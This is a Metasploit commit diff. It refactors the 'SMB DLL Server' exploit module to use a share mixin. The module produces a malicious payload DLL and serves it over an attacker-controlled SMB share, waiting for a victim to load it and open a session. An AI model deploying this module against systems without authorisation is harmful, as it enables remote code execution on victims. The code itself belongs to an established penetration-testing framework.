Modify SMB generation code to use primer based on #3074 changes to

implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
rapid7 · Feb 20, 2015 · da829d9 · da829d9
1 parent 9aef561
commit da829d9
Showing 1 changed file with 13 additions and 37 deletions.
diff --git a/modules/exploits/windows/smb/dllserver.rb b/modules/exploits/windows/smb/dllserver.rb
@@ -3,29 +3,29 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-# This is an example implementation of using the
+# This is an example implementation of using the 
 # Msf::Exploit::Remote::SMBFileServer module
-# to serve an arbitrary DLL over SMB 
+# to serve an arbitrary DLL over SMB
 
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  include Msf::Exploit::Remote::SMBFileServer
+  include Msf::Exploit::Remote::SMB::Server::Share
   include Msf::Exploit::EXE
 
   def initialize(info={})
     super(update_info(info,
       'Name'          => 'SMB DLL Server',
       'Description'   => %q{
         This is an example implementation of using the SMBFileServer module
-        to serve an arbitrary DLL over SMB. 
+        to serve an arbitrary DLL over SMB.
         This module will sit around waiting for a DLL to be loaded,
         for instance by the "payload/windows/loadlibrary" module.
       },
       'Author'      => [
         'Matthew Hall <hallm@sec-1.com>',
       ],
-      'DisclosureDate' => 'Apr 24 2014',
+      'DisclosureDate' => 'Mar 05 2014',
       'Platform'       => 'win',
       'Privileged'     => true,
       'Arch'         => ARCH_X86,
@@ -44,42 +44,18 @@ def initialize(info={})
           [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
           [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
         ],
-      'DefaultTarget'  => 0, # Default target is 32-bit
+      'DefaultTarget'  => 0, # Default target is 32-bit 
       ))
       register_options(
-      [
-        OptString.new('SHARE', [false, 'A static share path (ie. "share")']),
-        OptString.new('DLL', [false, 'A static DLL name (ie. "exploit.dll")'])
-      ], self.class)
+        [
+          OptString.new('FILE_NAME', [ false, 'DLL File name to share', 'exploit.dll'])
+        ], self.class)
+      deregister_options('FILE_CONTENTS')
   end
 
-  def start_server
-    print_status("Generating our malicious dll...")
-    exe = generate_payload_dll
-
-    if not datastore['DLL']
-      @exe_file = rand_text_alpha(7) + ".dll"
-    else
-      @exe_file = datastore['DLL']
-    end
-    if not datastore['SHARE']
-      @share = rand_text_alpha(5)
-    else
-      @share = datastore['SHARE']
-    end
-
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
-    @unc = "\\\\#{my_host}\\#{@share}\\#{@exe_file}"
-    print_status("Starting SMB Server on: " + @unc)
-    # start_smb_server('UNC Path', 'Payload', 'Name of file to be served')
-    start_smb_server(@unc, exe, @exe_file)
+  def primer 
+    self.exe_contents = generate_payload_dll
+    print_status("File available on #{unc}...")
   end
 
-  def exploit
-    start_server
-    while true
-      break if session_created?
-      sleep(1)
-    end
-  end
 end